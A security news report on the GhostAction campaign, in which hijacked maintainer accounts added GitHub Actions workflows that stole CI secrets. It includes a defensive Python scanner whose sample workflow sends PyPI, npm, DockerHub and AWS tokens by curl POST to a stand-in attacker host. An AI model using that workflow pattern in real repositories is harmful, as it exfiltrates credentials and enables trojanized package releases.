GhostAction Attack Led to the Exposure of 3,325 Secrets

Another significant supply chain attack, dubbed GhostAction, has been uncovered. This campaign targeted GitHub repositories and resulted in the theft of 3,325 secrets—including PyPI, npm, DockerHub, and GitHub tokens, as well as Cloudflare and AWS API keys.

How the Attack Was Discovered

The breach was first identified by researchers at GitGuardian, who observed suspicious activity in the open-source project FastUUID on September 2, 2025. Threat actors had compromised maintainer accounts and used them to commit a malicious GitHub Actions workflow file.

The injected workflow ran on every push and could also be started by hand (a workflow_dispatch trigger). Once it ran, it read the repository's GitHub Actions secrets into the job and sent them to an attacker-controlled domain in a curl POST request.

In FastUUID's case the stolen secrets included the project's PyPI token, but no malicious package was published before the intrusion was detected and contained.

Expanding the Scope

Further investigation revealed that GhostAction was far more widespread than a single project. Researchers found evidence that attackers introduced malicious commits into at least 817 repositories, all of which funneled stolen secrets to the same endpoint:

bold-dhawan[.]45-139-104-115[.]plesk[.]page

A GitHub Actions job only receives a secret that the workflow references by name, so the attackers appear to have read the secret names used in each repository's legitimate workflows and hardcoded those names into their own workflow. That is how a single template captured such a varied set of credentials across hundreds of projects.
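One way to triage a repository for the pattern described above, as an added example that is not GitGuardian's tooling or code from any affected project: a stdlib-only Python scanner that reads a workflow file, lists the secrets it references, and flags any curl or wget call to a host outside an allowlist. The allowlist, the four-secret threshold and the two embedded sample workflows (including the attacker.example host) are constructed for illustration.

```python
"""Heuristic scanner for a GitHub Actions workflow showing the GhostAction
pattern: secrets referenced by name plus a curl/wget call to an unknown host.
Added example for this page, not GitGuardian's tooling; the allowlist,
threshold and sample workflows are constructed."""
import re
from urllib.parse import urlparse

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
TRANSFER_TOOL = re.compile(r"\b(curl|wget)\b")

# Hosts a release workflow legitimately contacts (assumption: tune per project).
ALLOWED_HOSTS = {"github.com", "api.github.com", "upload.pypi.org",
                 "registry.npmjs.org"}
# GhostAction workflows hardcoded secret names copied from legitimate
# workflows; this many distinct names in one file deserves a look (assumption).
MANY_SECRETS = 4


def secret_names(text):
    """Distinct secret names the workflow reads via ${{ secrets.NAME }}."""
    return sorted(set(SECRET_REF.findall(text)))


def external_hosts(text):
    """Hosts named in URLs that are not on the allowlist."""
    hosts = set()
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname
        if host and host not in ALLOWED_HOSTS:
            hosts.add(host)
    return sorted(hosts)


def exfil_lines(text):
    """Lines that invoke curl/wget and mention an external host."""
    hosts = external_hosts(text)
    return [line.strip() for line in text.splitlines()
            if TRANSFER_TOOL.search(line) and any(h in line for h in hosts)]


def scan_workflow(text):
    """Return the findings for one workflow file's contents."""
    names = secret_names(text)
    lines = exfil_lines(text)
    return {
        "secrets": names,
        "external_hosts": external_hosts(text),
        "exfil_lines": lines,
        # Secrets read *and* an outbound transfer to an unknown host is the
        # GhostAction signature; either alone is common in honest workflows.
        "secrets_to_external_host": bool(names) and bool(lines),
        "many_secrets": len(names) >= MANY_SECRETS,
    }


# Constructed benign release workflow: one secret, no transfer tool.
BENIGN_WORKFLOW = """\
name: release
on:
  push:
    tags: ['v*']
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: python -m build
      - uses: pypa/gh-action-pypi-publish@release/v1
        with:
          password: ${{ secrets.PYPI_API_TOKEN }}
"""

# Constructed workflow in the GhostAction style: push or manual trigger,
# many secrets mapped into env, then POSTed to a host we do not know.
MALICIOUS_WORKFLOW = """\
name: ci
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    env:
      PYPI_TOKEN: ${{ secrets.PYPI_API_TOKEN }}
      NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
      DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
      AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
    steps:
      - run: |
          curl -s -X POST -d "p=$PYPI_TOKEN&n=$NPM_TOKEN&d=$DOCKERHUB_TOKEN" https://attacker.example/collect
"""

if __name__ == "__main__":
    for label, wf in (("benign", BENIGN_WORKFLOW), ("malicious", MALICIOUS_WORKFLOW)):
        print(label, scan_workflow(wf))
```

Run it over every file under .github/workflows/ in CI or as a pre-merge check: the benign sample produces no finding, while the GhostAction-style sample trips both the secrets-to-external-host and the many-secrets checks. It is a line-level heuristic, so treat a hit as a prompt for review rather than a verdict.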

Scale of the Compromise

Once the scale of the campaign became clear, GitGuardian and other security teams initiated remediation:

  • 573 repositories had GitHub Issues created to alert maintainers.
  • 100 repositories reverted the malicious commits.
  • The remaining projects were either deleted or disabled.

In total, researchers estimate 3,325 secrets were stolen, including PyPI and npm tokens, DockerHub and GitHub credentials, Cloudflare API tokens, AWS keys, and database logins.

At least nine npm packages and 15 PyPI packages were directly affected. Reverting the malicious commit does not undo the theft: the tokens were already exfiltrated and stay valid until they are revoked, so unless maintainers revoke them the attackers can publish malicious or trojanized versions of those packages at any time.

GhostAction vs. s1ngularity

The GhostAction campaign bears surface-level similarities to the s1ngularity attack disclosed in late August, which also abused GitHub Actions. However, GitGuardian researchers emphasize that the two incidents are not connected.

Key Takeaway

GhostAction underscores the growing risks posed by compromised maintainer accounts and poisoned workflows in software supply chains. Developers and organizations relying on GitHub Actions should:

  • Revoke and rotate API tokens and credentials, immediately after any suspected exposure and on a regular schedule otherwise.
  • Tighten repository access controls, including requiring review for any change under .github/workflows/.
  • Monitor workflow files for unauthorized changes and for steps that send secrets to hosts the project does not normally contact.